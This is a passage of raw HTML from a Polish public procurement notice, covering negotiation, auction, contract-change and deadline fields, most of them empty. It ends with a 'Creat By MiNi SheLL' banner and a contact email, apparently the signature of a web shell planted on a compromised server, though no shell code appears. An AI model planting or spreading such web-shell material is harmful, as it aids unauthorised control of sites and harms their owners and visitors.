id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zakres, charakter zmian oraz warunki ich wprowadzenia podają postanowienia działu XVI SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-08-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Mając na względzie, że zgodnie z art. 25a ust. 1 ustawy PZP (zdanie pierwsze) Zamawiający określazakres wskazanego tam oświadczenia - wskazane w sekcji III.3) ogłoszenia oświadczenie podlegazłożeniu w zakresie dla niego określonym w SIWZ.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com